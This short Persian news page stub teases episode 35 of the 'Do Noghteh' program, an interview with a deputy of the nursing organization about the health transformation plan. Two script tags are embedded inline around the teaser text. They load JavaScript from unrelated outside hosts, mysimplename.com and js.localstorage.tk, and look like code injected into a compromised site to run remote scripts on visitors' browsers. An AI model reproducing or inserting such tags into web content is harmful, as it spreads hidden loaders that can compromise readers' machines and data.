زالوهایی که باید پاکسازی بشوند!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>شماره سی و پنجم «دونقطه» با عنوان (متخصصان کاسب کار) در گفتگو با محمد شریفی مقدم، قائم مقام سازمان نظام پرستاری درباره طرح تحول نظام سلامت<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)